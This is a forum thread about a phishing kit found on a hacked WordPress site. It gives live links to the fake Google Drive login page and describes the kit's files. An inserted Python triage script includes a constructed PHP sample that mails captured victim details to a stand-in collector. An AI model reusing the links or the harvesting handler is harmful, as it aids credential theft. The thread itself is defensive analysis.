help me with this hacked website

bwanaaa

Senior member
Dec 26, 2002
I get letters from a business partner and yesterday received a weird one with a link to a Google Docs page. The email looked official so I clicked the link. BAD. Here it is, but BEWARE: it is a honeypot

http://cellxpressions.com/wp-includes/css/Docs/document.php

The link itself was labeled 'shared docs' and was in the middle of a page with official-looking info. Obviously my business partner's email has been hacked. And it has been used as a spam bot. And it tricked me into thinking it was a Google shared docs file. After I figured out what happened, I went back to the site and browsed the folder

http://cellxpressions.com/wp-includes/css/Docs/

and there are a bunch of scripts there. I want to find out what those scripts do and track down the origin of this deviant. Obviously the website has no idea they have been hacked.

Besides reporting this site to Google and cellxpressions, what can I do? I want to find out what those scripts do and who they communicate back to. I guess I need to log into the server at cellxpressions?
 

John Connor

Lifer
Nov 30, 2012
I use Bitdefender Free and when I click the link I get this.

I could allow it since I'm using a sandbox and a VPN, but I'm not going to.

Use Dropbox and upload the script files and I'll have a look.

A lot of hacks come from e-mail. Use common sense next time. You said yourself it was weird. Why did you click it? If you use the Thunderbird e-mail client, install the Dr. Web Anti-Virus Link Checker. Once installed you can right-click links in the e-mail and it will tell you if it's infected or not. You can use Thunderbird with Gmail.


Edit: Went to the link and I need access to Google Drive.

It looks like a WordPress directory by the looks of the URL, which is weird. Do you know InMotion Hosting, Inc.? The IP address is actually blacklisted as Hackers, Spyware, Botnets etc. That must have been why my Bitdefender got triggered.
 

bwanaaa

Senior member
Dec 26, 2002
So in the directory,
http://cellxpressions.com/wp-includes/css/Docs/
are 3 HTML files and 3 PHP files.
view.html
pvalidate.html
processing.html
document.php
real2.php
really2.php
I can download these files and read them with a text editor.

The view.html document runs the document.php script. The document.php is a rather long file. It pulls a stylesheet from a folder on a google drive here,
http://googledrive.com/host/0By9Kk_KdPlufOVdIdzFSX25lYzg/
and it draws a fake google drive login page. It then validates the input to make sure you have typed in a valid email and telephone number. There is one reference to the really2.php script that seems to do more data validation.
I don't know where/how the processing.html or the validate.html documents are used. There is no reference to them.
The really interesting script is the real2.php script.
It is really a PDF document from Morgan Stanley that has been modified. I've read about PDF exploits and suspect this may be one but do not know how to analyze it. Any suggestions?

Still, I cannot see where the data they solicit is stored or sent anywhere else. So the whole structure may be a ruse to get the 'PDF' to run.
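A static first-pass triage of the kind of files described above (a PHP handler that takes an e-mail and phone number, plus a ".php" that is really a PDF), as an added example that is not from the thread or from the kit itself: it flags the PHP calls that store or forward captured input, lists hard-coded URLs, checks whether a file's magic bytes say PDF at all, and lists the PDF keywords that mark active content. The PHP and PDF samples are constructed fixtures, not the real files; run it against the downloaded copies offline, never by executing them.

```python
import re

# PHP calls a harvesting page typically uses to store or forward what the
# victim typed; a hit is a lead to read around, not proof on its own.
PHP_SINKS = {
    "mail(": "e-mails captured data",
    "curl_exec(": "posts data to a remote collector",
    "fsockopen(": "opens a raw network connection",
    "file_put_contents(": "appends to a local log file",
    "fwrite(": "writes to a local file",
    "header(": "redirects the victim afterwards",
    "base64_decode(": "unpacks obfuscated content",
    "eval(": "runs obfuscated code",
}

# PDF name objects that mark active content; a plain scanned document has none.
PDF_ACTIVE = [b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/Launch", b"/EmbeddedFile"]

def triage_php(source: str) -> dict:
    """Map each suspicious call to the 1-based line numbers where it appears."""
    hits = {}
    for lineno, line in enumerate(source.splitlines(), 1):
        for sink in PHP_SINKS:
            if sink in line:
                hits.setdefault(sink, []).append(lineno)
    return hits

def extract_urls(source: str) -> list:
    """Collect every hard-coded URL: candidate collectors or redirect targets."""
    return sorted(set(re.findall(r"https?://[^\s'\"<>]+", source)))

def triage_pdf(data: bytes) -> dict:
    """Check the magic bytes (is this really a PDF?) and list active-content keywords."""
    found = [kw.decode() for kw in PDF_ACTIVE if re.search(re.escape(kw) + rb"\b", data)]
    return {"is_pdf": data.startswith(b"%PDF"), "active_content": found}

# Constructed fixtures standing in for the downloaded files; not the real kit.
SAMPLE_PHP = r"""<?php
// constructed sample of a form handler that forwards what was typed
$email = $_POST['email']; $phone = $_POST['phone'];
$msg = "Email: $email Phone: $phone";
mail("collector@example.invalid", "New login", $msg);
file_put_contents("rez.txt", $msg, FILE_APPEND);
header("Location: https://drive.google.com/");
?>"""
SAMPLE_PDF = (b"%PDF-1.4\n1 0 obj << /Type /Catalog /OpenAction 2 0 R >> endobj\n"
              b"2 0 obj << /S /JavaScript /JS (x) >> endobj\n%%EOF")

if __name__ == "__main__":
    for sink, lines in triage_php(SAMPLE_PHP).items():
        print(f"{sink:22} lines {lines}: {PHP_SINKS[sink]}")
    print("URLs:", extract_urls(SAMPLE_PHP))
    print("PDF:", triage_pdf(SAMPLE_PDF))
```

A file named .php whose first bytes are `%PDF` confirms the disguise described above; an `/OpenAction` pointing at a `/JavaScript` object is the usual sign that the document runs something on open and deserves a proper PDF analysis tool rather than a viewer.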
 

John Connor

Lifer
Nov 30, 2012
Since all this crap is taking place on Google Drive I would get in contact with Google. I'm sure they appreciate a guy using their services for hacks.
 

Elixer

Lifer
May 7, 2002
Well, VirusTotal shows this for that URL:
https://www.virustotal.com/en/url/a...bd6108bd25ca474755a771d6/analysis/1420846217/

As for getting to the bottom of this, you would have to get access to all those files and decode them if they are encrypted; then, most likely, it is using a proxy to transfer the info to.
It is rather difficult to backtrace all this stuff if you don't know what you are doing, so in this case I would report it to Google, as was suggested, and they have a team that can look into this.